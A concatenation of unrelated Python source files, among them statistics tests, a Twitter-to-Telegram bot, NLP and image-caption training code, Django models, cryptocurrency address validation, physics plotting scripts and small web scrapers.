1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 2., 1., 1.,
2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 3., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1.])
y = np.array([ 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1.,
1., 2., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 1., 1., 3., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 2., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 2., 2., 1., 1., 2., 1., 1., 2.,
1., 2., 1., 1., 1., 1., 2., 2., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 2., 2., 2., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 2., 1., 1., 2., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 2., 1., 1., 1., 1., 1.,
1.])
print stats.ranksums(x,y)
print stats.mstats.mannwhitneyu(x,y)
print stats.stats.mannwhitneyu(x,y)
print 'correct is (16980.5, 5.6428655312664676e-005)'
from numpy.testing import assert_array_almost_equal
assert_array_almost_equal(stats.stats.mannwhitneyu(x,y),
(16980.5, 2.8214327656317373e-005))
print stats.stats.mannwhitneyu(x, y, use_continuity=False)
print stats.kruskal(x,y)
|
990,950 | 85df36f1a412a40bc8b39b8be55646de8d2c8b16 | #Import the necessary methods from tweepy library
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import json
import requests
#Variables that contains the user credentials to access Twitter API
access_token = ""
access_token_secret = ""
consumer_key = ""
consumer_secret = ""
#This is a basic listener that just prints received tweets to stdout.
class StdOutListener(StreamListener):
def on_data(self, data):
decoded = json.loads(data)
print(json.dumps(decoded,sort_keys=True))
print(decoded['text'].encode('utf-8', 'ignore'),
decoded['text'],
type(decoded['text'])
)
chat_id = '' #telegram chat id
apiurl = '' #telegram bot api
try: #if photo exist ,then do the work
print(decoded["entities"]["media"][0]["media_url_https"])
telemethod = "sendPhoto"
urlphoto = '%s%s?chat_id=%s&photo=%s' % (apiurl,telemethod,chat_id,decoded["entities"]["media"][0]["media_url_https"]) #imageurl
telemethod = "sendMessage"
urlm = '%s%s?chat_id=%s&text=%s' % (apiurl,telemethod,chat_id,decoded["entities"]["media"][0]["url"]) #messangeurl
#偵測是否含有指定字
if("月曜日のたわわ" in decoded['text'] and "その" in decoded['text'] and "RT" not in decoded['text']):
print("Exist!!!")
r = requests.get(urlm+' this week\'s tawawa') #send url & bot's msg
print(r.status_code)
r = requests.get(urlphoto) #send image
print(r.status_code)
except:
print("No Photo RRRRRRRR")
pass
return True
def on_error(self, status):
print(status)
if __name__ == '__main__':
#This handles Twitter authetification and the connection to Twitter Streaming API
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
#This line filter Twitter Streams to capture data by the keyword: 'python'
#users = []
stream.filter(follow=[]) # filter source with twitter user id |
990,951 | 03468eb136177ef0c398e46aef70d153904bfc61 | import torch
from tqdm import tqdm
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, pos, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.pos = pos
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, gather_ids, gather_masks, partial_masks):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.gather_ids = gather_ids
self.gather_masks = gather_masks
self.partial_masks = partial_masks
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def __init__(self, logger):
self.logger = logger
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r", encoding='utf-8') as f:
lines = []
for line in f:
lines.append(line.strip())
return lines
class Processor(DataProcessor):
"""Processor NQG data set."""
def __init__(self, logger, dataset, latent_size):
self.logger = logger
if dataset == "ACE04" or dataset == "ACE05":
self.labels = ['PER', 'LOC', 'ORG', 'GPE', 'FAC', 'VEH', 'WEA']
elif dataset == "GENIA":
self.labels = ['None', 'G#RNA', 'G#protein', 'G#DNA', 'G#cell_type', 'G#cell_line']
else:
raise NotImplementedError()
if dataset == "ACE05" or dataset == "GENIA" or dataset == "ACE04":
self.interval = 4
else:
raise NotImplementedError()
self.latent_size = latent_size
def get_train_examples(self, input_file):
"""See base class."""
self.logger.info("LOOKING AT {}".format(input_file))
return self._create_examples(
self._read(input_file), "train")
def get_dev_examples(self, input_file):
"""See base class."""
self.logger.info("LOOKING AT {}".format(input_file))
return self._create_examples(
self._read(input_file), "dev")
def get_labels(self):
"""See base class."""
return self.labels
def _create_examples(self, lines, type):
"""Creates examples for the training and dev sets."""
examples = []
for i in range(0, len(lines), self.interval):
text_a = lines[i]
label = lines[i + 2]
examples.append(
InputExample(guid=len(examples), text_a=text_a, pos=None, label=label))
return examples
def convert_examples_to_features(self, examples, max_seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
features = []
for (ex_index, example) in enumerate(tqdm(examples)):
tokens = tokenizer.tokenize(example.text_a)
gather_ids = list()
for (idx, token) in enumerate(tokens):
if (not token.startswith("##") and idx < max_seq_length - 2):
gather_ids.append(idx + 1)
# Account for [CLS] and [SEP] with "- 2"
if len(tokens) > max_seq_length - 2:
tokens = tokens[:max_seq_length - 2]
tokens = ["[CLS]"] + tokens + ["[SEP]"]
segment_ids = [0] * len(tokens)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
padding = [0] * (max_seq_length - len(input_ids))
input_ids += padding
input_mask += padding
segment_ids += padding
gather_padding = [0] * (max_seq_length - len(gather_ids))
gather_masks = [1] * len(gather_ids) + gather_padding
gather_ids += gather_padding
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(gather_ids) == max_seq_length
assert len(gather_masks) == max_seq_length
partial_masks = self.generate_partial_masks(example.text_a.split(' '), max_seq_length, example.label,
self.labels)
if ex_index < 2:
self.logger.info("*** Example ***")
self.logger.info("guid: %s" % (example.guid))
self.logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
self.logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
self.logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
self.logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
self.logger.info(
"gather_ids: %s" % " ".join([str(x) for x in gather_ids]))
self.logger.info(
"gather_masks: %s" % " ".join([str(x) for x in gather_masks]))
# self.logger.info("label: %s (id = %s)" % (example.label, " ".join([str(x) for x in label_ids])))
features.append(
InputFeatures(input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
partial_masks=partial_masks,
gather_ids=gather_ids,
gather_masks=gather_masks))
return features
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
def generate_partial_masks(self, tokens, max_seq_length, labels, tags):
total_tags_num = len(tags) + self.latent_size
labels = labels.split('|')
label_list = list()
for label in labels:
if not label:
continue
sp = label.strip().split(' ')
start, end = sp[0].split(',')[:2]
start = int(start)
end = int(end) - 1
label_list.append((start, end, sp[1]))
mask = [[[2 for x in range(total_tags_num)] for y in range(max_seq_length)] for z in range(max_seq_length)]
l = min(len(tokens), max_seq_length)
# 2 marginalization
# 1 evaluation
# 0 rejection
for start, end, tag in label_list:
if start < max_seq_length and end < max_seq_length:
tag_idx = tags.index(tag)
mask[start][end][tag_idx] = 1
for k in range(total_tags_num):
if k != tag_idx:
mask[start][end][k] = 0
for i in range(l):
if i > end:
continue
for j in range(i, l):
if j < start:
continue
if (i > start and i <= end and j > end) or (i < start and j >= start and j < end):
for k in range(total_tags_num):
mask[i][j][k] = 0
for i in range(l):
for j in range(0, i):
for k in range(total_tags_num):
mask[i][j][k] = 0
for i in range(l):
for j in range(i, l):
for k in range(total_tags_num):
if mask[i][j][k] == 2:
if k < len(tags):
mask[i][j][k] = 0
else:
mask[i][j][k] = 1
for i in range(max_seq_length):
for j in range(max_seq_length):
for k in range(total_tags_num):
if mask[i][j][k] == 2:
mask[i][j][k] = 0
return mask
class MultitasksResultItem():
def __init__(self, id, start_prob, end_prob, span_prob, label_id, position_id, start_id, end_id):
self.start_prob = start_prob
self.end_prob = end_prob
self.span_prob = span_prob
self.id = id
self.label_id = label_id
self.position_id = position_id
self.start_id = start_id
self.end_id = end_id
def eval(args, outputs, partial_masks, label_size, gather_masks):
correct, pred_count, gold_count = 0, 0, 0
gather_masks = gather_masks.sum(1).cpu().numpy()
outputs = outputs.cpu().numpy()
partial_masks = partial_masks.cpu().numpy()
for output, partial_mask, l in zip(outputs, partial_masks, gather_masks):
golds = list()
preds = list()
for i in range(l):
for j in range(l):
if output[i][j] >= 0:
if output[i][j] < label_size:
preds.append("{}_{}_{}".format(i, j, int(output[i][j])))
for k in range(label_size):
if partial_mask[i][j][k] == 1:
golds.append("{}_{}_{}".format(i, j, k))
pred_count += len(preds)
gold_count += len(golds)
correct += len(set(preds).intersection(set(golds)))
return correct, pred_count, gold_count
|
990,952 | f729f0424aec4725e5525873dbfa5a5cbfddbbfe | # Generated by Django 3.1 on 2021-05-14 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Productos', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='productos',
name='activo',
field=models.BooleanField(default=True, verbose_name='Activo'),
),
]
|
990,953 | ce7a4cca9a9c0f68485006c6d08d602366ff4532 | import numpy as np
from numpy import ones, zeros, diag, sqrt, r_, atleast_2d
from numpy import sum as npsum
from numpy.linalg import solve, norm
from sklearn.covariance import graph_lasso
from FPmeancov import FPmeancov
from LassoRegFP import LassoRegFP
# from GraphLasso import GraphLasso
def RobustLassoFPReg(X,Z,p,nu,tol,lambda_beta=0,lambda_phi=0,flag_rescale=0):
# Robust Regression - Max-Likelihood with Flexible Probabilites & Shrinkage
# (multivariate Student t distribution with given degrees of freedom = nu)
# INPUTS
# X : [matrix] (n_ x t_end ) historical series of dependent variables
# Z : [matrix] (k_ x t_end) historical series of independent variables
# p : [vector] flexible probabilities
# nu : [scalar] multivariate Student's t degrees of freedom
# tol : [scalar] or [vector] (3 x 1) tolerance, needed to check convergence
# lambda_beta : [scalar] lasso regression parameter
# lambda_phi : [scalar] graphical lasso parameter
# flag_rescale : [boolean flag] if 0 (default), the series is not rescaled
#
# OPS
# alpha_RMLFP : [vector] (n_ x 1) shifting term
# beta_RMLFP : [matrix] (n_ x k_) optimal loadings
# sig2_RMLFP : [matrix] (n_ x n_) matrix of residuals.T covariances
# For details on the exercise, see here .
## Code
[n_, t_] = X.shape
k_ = Z.shape[0]
# if FP are not provided, observations are equally weighted
if p is None:
p = ones((1,t_))/t_
# adjust tolerance input
if isinstance(tol, float):
tol = [tol, tol, tol]
# rescale variables
if flag_rescale == 1:
_,cov_Z=FPmeancov(Z, p)
sig_Z = sqrt(diag(cov_Z))
_,cov_X=FPmeancov(X,p)
sig_X = sqrt(diag(cov_X))
Z = np.diagflat(1/sig_Z)@Z
X = np.diagflat(1/sig_X)@X
# initialize variables
alpha = zeros((n_,1))
beta = zeros((n_,k_,1))
sig2 = zeros((n_,n_,1))
# 0. Initialize
alpha[:,[0]], beta[:,:,[0]], sig2[:,:,[0]], U = LassoRegFP(X, Z, p, 0, 0)
error = ones(3)*10**6
maxIter = 500
i = 0
while any(error>tol) and (i < maxIter):
i = i+1
# 1. Update weights
z2 = np.atleast_2d(U).T@(solve(sig2[:,:,i-1],np.atleast_2d(U)))
w = (nu+n_)/(nu+diag(z2).T)
# 2. Update FP
p_tilde = (p*w) / npsum(p*w)
# 3. Update output
# Lasso regression
new_alpha, new_beta, new_sig2, U = LassoRegFP(X,Z,p_tilde,lambda_beta)
new_beta = new_beta.reshape(n_,k_,1)
new_sig2 = new_sig2.reshape(n_,n_,1)
U = U.squeeze()
alpha = r_['-1',alpha,new_alpha]
beta = r_['-1',beta,new_beta]
sig2 = r_['-1',sig2,new_sig2]
sig2[:,:,i] = npsum(p*w)*sig2[:,:,i]
# Graphical lasso
if lambda_phi != 0:
sig2[:,:,i],_,_,_=graph_lasso(sig2[:,:,i],lambda_phi)
# 3. Check convergence
error[0] = norm(alpha[:,i]-alpha[:,i-1])/norm(alpha[:,i-1])
error[1] = norm(beta[:,:,i]-beta[:,:,i-1],ord='fro')/norm(beta[:,:,i-1],ord='fro')
error[2] = norm(sig2[:,:,i]-sig2[:,:,i-1],ord='fro')/norm(sig2[:,:,i-1],ord='fro')
# Output
alpha_RMLFP = alpha[:,-1]
beta_RMLFP = beta[:,:,-1]
sig2_RMLFP = sig2[:,:,-1]
# From rescaled variables to non-rescaled variables
if flag_rescale == 1:
alpha_RMLFP = diag(sig_X)@alpha_RMLFP
beta_RMLFP = diag(sig_X)@beta_RMLFP @diag(1/sig_Z)
sig2_RMLFP = diag(sig_X)@sig2_RMLFP@diag(sig_X).T
return alpha_RMLFP, beta_RMLFP, sig2_RMLFP
|
990,954 | 56890266a2b54a68b8a4256f9538fcd44295bfb9 | Clock.bpm = 120
Root.default = 'C'
Scale.default = Scale.major
d1 >> play("----", amp=1, sample=3, dur=1, formant=0)
d2 >> play("x x x x", sample=3, formant=0).every(4, "stutter", 2)
d3 >> play(" |o5|", dur=2, lpf=1200)
b1 >> bass([0, -2.5, -3, -3], dur=[3, 5], amp=0.5)
b2 >> ambi([0, -2.5, -3, -3], dur=[3, 5], amp=0.5, drive=0.05, tremolo=2) + var([(0, 4, 7), (0,3,5), (0,4,6), (0,4,6)])
|
990,955 | 3f636acbb7c778ea534ca99f4d60f7d4ed61704f |
import binascii
from .. import encoding
from ..networks import DEFAULT_NETCODES, NETWORK_NAMES, NETWORKS
from ..serialize import h2b
DEFAULT_ADDRESS_TYPES = ["address", "pay_to_script"]
def _generate_network_prefixes():
d = {}
for n in NETWORKS:
for prop in "wif address pay_to_script prv32 pub32".split():
v = getattr(n, prop, None)
if v:
if v not in d:
d[v] = []
d[v].append((n, prop))
return d
NETWORK_PREFIXES = _generate_network_prefixes()
def netcode_and_type_for_data(data, netcodes=NETWORK_NAMES):
"""
Given some already-decoded raw data from a base58 string,
return (N, T) where N is the network code ("BTC" or "LTC") and
T is the data type ("wif", "address", "public_pair", "prv32", "pub32").
May also raise EncodingError.
"""
d = {}
for length in (4, 1):
for network, the_type in NETWORK_PREFIXES.get(data[:length], []):
d[network.code] = the_type
for netcode in netcodes:
v = d.get(netcode)
if v:
return netcode, v
raise encoding.EncodingError("unknown prefix")
def netcode_and_type_for_text(text):
# check for "public pair"
try:
LENGTH_LOOKUP = {
33: "public_pair",
65: "public_pair",
16: "elc_seed",
32: "elc_prv",
64: "elc_pub",
}
as_bin = h2b(text)
l = len(as_bin)
if l in LENGTH_LOOKUP:
return None, LENGTH_LOOKUP[l], as_bin
except (binascii.Error, TypeError):
pass
data = encoding.a2b_hashed_base58(text)
netcode, the_type = netcode_and_type_for_data(data)
length = 1 if the_type in ["wif", "address"] else 4
return netcode, the_type, data[length:]
def _check_against(text, expected_type, allowable_netcodes):
try:
data = encoding.a2b_hashed_base58(text)
netcode, the_type = netcode_and_type_for_data(data, netcodes=allowable_netcodes)
if the_type in expected_type and netcode in allowable_netcodes:
return netcode
except encoding.EncodingError:
pass
return None
def is_address_valid(address, allowable_types=DEFAULT_ADDRESS_TYPES, allowable_netcodes=DEFAULT_NETCODES):
"""
Accept an address, and a list of allowable address types (a subset of "address" and "pay_to_script"),
and allowable networks (defaulting to just Bitcoin mainnet), return the network that the address is
a part of, or None if it doesn't validate.
"""
return _check_against(address, allowable_types, allowable_netcodes)
def is_wif_valid(wif, allowable_netcodes=DEFAULT_NETCODES):
"""
Accept a WIF, and a list of allowable networks (defaulting to just Bitcoin mainnet), return
the network that the wif is a part of, or None if it doesn't validate.
"""
return _check_against(wif, ["wif"], allowable_netcodes)
def is_public_bip32_valid(hwif, allowable_netcodes=DEFAULT_NETCODES):
"""
Accept a text representation of a BIP32 public wallet, and a list of allowable networks (defaulting
to just Bitcoin mainnet), return the network that the wif is a part of, or None if it doesn't validate.
"""
return _check_against(hwif, ["pub32"], allowable_netcodes)
def is_private_bip32_valid(hwif, allowable_netcodes=DEFAULT_NETCODES):
"""
Accept a text representation of a BIP32 private wallet, and a list of allowable networks (defaulting
to just Bitcoin mainnet), return the network that the wif is a part of, or None if it doesn't validate.
"""
return _check_against(hwif, ["prv32"], allowable_netcodes)
|
990,956 | 07dfae53d2c5a23be3f526201d6884a866e48bc0 | from ROOT import TFile, TTree, gROOT, TH1F, TCanvas, gStyle, TF1, TProfile, TH2F
from sys import exit
import os
#import argparse
#Open Jan TDR analysis file
janName = 'Run-497-TDR-Analysis'
janFileName = janName + '-BeamPeriod.root'
janFile = TFile(janFileName, 'READ')
if (janFile.IsOpen == False):
print "ERROR: ROOT file does not exist"
exit(-1)
janDir = janFile.Get(janName)
#Open Jan sim TDR analysis file
simName = 'Run-SIM-TDR-Analysis'
janSimFileName = simName + '-JanBeamPeriod.root'
janSimFile = TFile(janSimFileName, 'READ')
if (janSimFile.IsOpen == False):
print "ERROR: ROOT file does not exist"
exit(-1)
janSimDir = janSimFile.Get(simName)
#Open April TDR analysis file
aprName = 'Run-1300-TDR-Analysis'
aprFileName = aprName + '-BeamPeriod.root'
aprFile = TFile(aprFileName, 'READ')
if (aprFile.IsOpen == False):
print "ERROR: ROOT file does not exist"
exit(-1)
aprDir = aprFile.Get(aprName)
#Open April sim TDR analysis file
aprSimFileName = simName + '-AprBeamPeriod.root'
aprSimFile = TFile(aprSimFileName, 'READ')
if (aprSimFile.IsOpen == False):
print "ERROR: ROOT file does not exist"
exit(-1)
aprSimDir = aprSimFile.Get(simName)
#Hit times Jan
beamPeriodCanvas = TCanvas("beamPeriodCanvas","Hit times [ns] (data and sim)", 1000, 600)
beamPeriodCanvas.SetTitle('')
beamPeriodCanvas.Divide(2,1)
beamPeriodCanvas.cd(1)
janHitTimeHist = janDir.Get('Hit_Time_Structure_Channel_8')
janHitTimeHist.GetXaxis().SetRangeUser(115e3,170e3)
#janHitTimeHist.SetTitle('Hits times (January data)')
janHitTimeHist.SetTitle('(a)')
janHitTimeHist.GetXaxis().SetTitle('Hit time [ns]')
janHitTimeHist.GetYaxis().SetTitle('Counts')
janHitTimeHist.GetYaxis().SetTitleOffset(1.5)
janHitTimeHist.SetStats(False)
janHitTimeHist.Draw()
beamPeriodCanvas.cd(2)
janSimHitTimeHist = janSimDir.Get('Hit_Time_Structure_Channel_0')
janSimHitTimeHist.GetXaxis().SetRangeUser(115e3,170e3)
#janSimHitTimeHist.SetTitle('Hits times (Simulation)')
janSimHitTimeHist.SetTitle('(b)')
janSimHitTimeHist.GetXaxis().SetTitle('Hit time [ns]')
janSimHitTimeHist.GetYaxis().SetTitle('Counts')
janSimHitTimeHist.GetYaxis().SetTitleOffset(1.5)
janSimHitTimeHist.SetStats(False)
janSimHitTimeHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")
#Hit times gaps Jan
janGapsCanvas = TCanvas("janGapsCanvas","", 1000, 600)
janGapsCanvas.Divide(2,1)
janGapsCanvas.cd(1)
janTimeGapsHist = janDir.Get('Straw_Hit_Time_Gaps_Channel_8')
janTimeGapsHist.GetXaxis().SetRangeUser(6e3,40e3)
#janTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (January data)')
janTimeGapsHist.SetTitle('(a)')
janTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
janTimeGapsHist.GetYaxis().SetTitle('Counts')
janTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
janTimeGapsHist.SetStats(False)
janTimeGapsHist.Draw()
janGapsCanvas.cd(2)
janSimTimeGapsHist = janSimDir.Get('Straw_Hit_Time_Gaps_Channel_0')
janSimTimeGapsHist.GetXaxis().SetRangeUser(6e3,40e3)
#
janSimTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (Simulation)')
janSimTimeGapsHist.SetTitle('(b)')
janSimTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
janSimTimeGapsHist.GetYaxis().SetTitle('Counts')
janSimTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
janSimTimeGapsHist.SetStats(False)
janSimTimeGapsHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")
#Hit times gaps April
aprGapsCanvas = TCanvas("aprGapsCanvas","", 1000, 600)
aprGapsCanvas.Divide(2,1)
aprGapsCanvas.cd(1)
aprTimeGapsHist = aprDir.Get('Straw_Hit_Time_Gaps_Channel_8')
aprTimeGapsHist.GetXaxis().SetRangeUser(9e3,40e3)
#aprTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (April data)')
aprTimeGapsHist.SetTitle('(a)')
aprTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
aprTimeGapsHist.GetYaxis().SetTitle('Counts')
aprTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
aprTimeGapsHist.SetStats(False)
aprTimeGapsHist.Draw()
aprGapsCanvas.cd(2)
aprSimTimeGapsHist = aprSimDir.Get('Straw_Hit_Time_Gaps_Channel_0')
aprSimTimeGapsHist.GetXaxis().SetRangeUser(9e3,40e3)
#aprSimTimeGapsHist.SetTitle('Time gaps between consecutive straw hits (Simulation)')
aprSimTimeGapsHist.SetTitle('(b)')
aprSimTimeGapsHist.GetXaxis().SetTitle('Hit time [ns]')
aprSimTimeGapsHist.GetYaxis().SetTitle('Counts')
aprSimTimeGapsHist.GetYaxis().SetTitleOffset(1.5)
aprSimTimeGapsHist.SetStats(False)
aprSimTimeGapsHist.Draw()
#Wait for user input
raw_input("Press Enter to continue...")
|
990,957 | 89ab79c0639406402d2a96878615a57c5a5d5b96 | #sıradan
element=(1,2)
print(element)
#tek tek erişim
x,y =(1,2)
print(x)
print(y)
#deneme2
x,_ =(1,2)
print(x)
#print(y)
#deneme3
x,y,*z =(1,2,3,4,5,6)
print(x)
print(y)
print(z)
#deneme4
x,y,*z,t =(1,2,3,4,5,6)
print(x)
print(y)
print(z)
print(t)
#z'yi yorum satırı yapssak dahi t hep en son değeri alacaktır
|
990,958 | db52faff7c91ca7b855add1493ccbad4319f126e | from AI.vocab.CaptionVocab import load_voca,load_tokenized_data,save_tokenized_data,tokenized_data
from AI.dataload.CaptionDataManagement import make_caption_loader
from AI.models.Captionmodel.Encoder import EncoderCNN
from AI.models.Captionmodel.Decoder import DecoderRNN
import torch
import torch.nn as nn
import torch.optim as optim
from torch.nn.utils.rnn import pack_padded_sequence
from transformers import AdamW,get_linear_schedule_with_warmup
from tqdm import tqdm, trange
import json
def caption_train(vocab_path, image_path, cfg, caption_path, word2idx_path=None):
voca = load_voca(vocab_path)
if word2idx_path is not None:
dataset = load_tokenized_data(word2idx_path)
else:
dataset = tokenized_data(caption_path, voca, type="train")
save_tokenized_data(dataset, type="train")
batch = cfg['caption_batch']
embed_size = cfg['caption_embed_size']
hidden_size = cfg['caption_hidden_size']
hidden_layer = cfg['caption_hidden_layer']
epochs = cfg['caption_epoch']
loader = make_caption_loader(dataset, batch, image_path)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
encoder = EncoderCNN(embed_size)
decoder = DecoderRNN(embed_size,len(voca),hidden_layers_num=hidden_layer,hidden_size=hidden_size)
encoder.to(device)
decoder.to(device)
learning_rate = 5e-5
adam_epsilon = 1e-8
loss_function = nn.CrossEntropyLoss()
param_list = list(encoder.linear.parameters()) + list(encoder.bn.parameters()) + list(decoder.parameters())
optimizer = AdamW(param_list, lr=learning_rate, eps=adam_epsilon)
num_training_steps = len(loader) * epochs
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=0, num_training_steps=num_training_steps
)
global_step = 0
epochs_trained = 0
tr_loss = 0.0
logging_loss = 0.0
train_iterator = trange(
epochs_trained, int(epochs), desc="Epoch"
)
logging_steps = 500
loss_record = []
for epoch in train_iterator:
epoch_iterator = tqdm(loader, desc="Iteration")
for idx_of_batch,(images, word2idxes,length) in enumerate(epoch_iterator):
images,word2idxes = images.to(device),word2idxes.to(device)
features = encoder(images)
compare_targets = pack_padded_sequence(word2idxes,length,batch_first=True).data
output = decoder(word2idxes,features,length)
loss = loss_function(output,compare_targets)
optimizer.zero_grad()
loss.backward()
optimizer.step()
scheduler.step()
tr_loss += loss.item()
global_step += 1
if logging_steps > 0 and global_step % logging_steps == 0:
logs = {}
loss_scalar = (tr_loss - logging_loss) / logging_steps
learning_rate_scalar = scheduler.get_last_lr()[0]
logs["learning_rate"] = learning_rate_scalar
logs["loss"] = loss_scalar
loss_record.append(loss_scalar)
logging_loss = tr_loss
epoch_iterator.write(json.dumps({**logs, **{"step": global_step}}))
return loss_record,encoder,decoder |
990,959 | 1d7498eaadabcd78a74c65c0c086953d51ae6bc4 | from django.db import models
from django.urls import reverse
# ORM : OBEJCT RELATIONAL MAPPING
# Create your models here.
class course_info(models.Model):
#member variable
name=models.CharField(max_length=30)
descrition=models.TextField()
duration=models.IntegerField()
fees=models.IntegerField()
#member function
def __str__(self):
return f"{self.name}"
def get_absolute_url(self):
return reverse('view') |
990,960 | eee229d0947f2f0713aa80073e2caf4230d2fb75 | from sebastian.src.ChoraleAnalysis.ChoraleAnalysis import XMLChoraleAnalysis
import sebastian.tests.testfiles.TestFilePaths as TestFilePaths
from sebastian.src.SebastianStructures import Constants
from sebastian.src.Utils.Utils import *
from music21 import note
import unittest
class ParallelUnisonIntegrationTests(unittest.TestCase):
def test_ThrowsErrorWithParallelUnisons(self):
analysis = XMLChoraleAnalysis(TestFilePaths.parallel_unison)
analysis.analyze()
errors = analysis.get_error_list("ParallelUnisonError")
self.assertEqual(1, len(errors))
def test_CorrectPropertiesOnParallelUnisonError(self):
analysis = XMLChoraleAnalysis(TestFilePaths.parallel_unison)
analysis.analyze()
error = get_only_element(analysis.get_error_list("ParallelUnisonError"))
self.assertEqual("Unison", error.get_interval_name())
self.assertEqual(Constants.ALTO_PART_NUMBER, error.get_part_number_1())
self.assertEqual(Constants.TENOR_PART_NUMBER, error.get_part_number_2())
self.assertEqual(2, error.get_measure_1())
self.assertEqual(1.0, error.get_beat_1())
self.assertEqual(2, error.get_measure_2())
self.assertEqual(2.0, error.get_beat_2())
self.assertEqual(note.Note("C4"), error.get_notes()[0])
self.assertEqual(note.Note("D4"), error.get_notes()[1])
self.assertEqual(note.Note("C4"), error.get_notes()[2])
self.assertEqual(note.Note("D4"), error.get_notes()[3])
if __name__ == "__main__":
unittest.main() |
990,961 | 65cf0ba746ccc59bbb6d96fca5250447c1815b57 | #用request+beautifulsoup抓取tripadvisor
print('hi')
from bs4 import BeautifulSoup
import requests
import time#为了做一个保护
#模拟登陆:
'''
headers = {
'User-Agent':'ctrl+v'
'Cookie':'ctrl+v'
}
url=''
wb_data = requests.get(url,headers=headers)
soup = BeautifulSoup(wb_data.text,'lxml')
'''
url=('https://mp.weixin.qq.com/s/xu-rtXSKy9oWkrOc_13wqw')
def get_data(url,data=None) :#定义一个函数:一个小技巧,不需要登陆或模拟登入后写data=None就会返回data的值
wb_data = requests.get(url)
time.sleep(1)#这是一个重要的保护措施
Soup = BeautifulSoup(wb_data.text,'lxml')
print(Soup)
get_data(url)
#get_data(url)#成功
#print(urls)#链接列表 成功
#for every_url in urls:
#get_data(every_url)#失败
'''
似乎有反爬取,。。。图片链接都一样 解决方案可以用移动端,新建一个文件 11.5,这次爬酒店的
'''
get_data(url) |
990,962 | 2bd4037127d967a20dc2785775ef3686a1de5fb4 | import scrapy
from ..items import WoodsItem
class ManningtonspiderSpider(scrapy.Spider):
name = 'manningtonSpider'
allowed_domains = ['mannington.com']
start_urls = ['https://mannington.com/']
def parse(self, response):
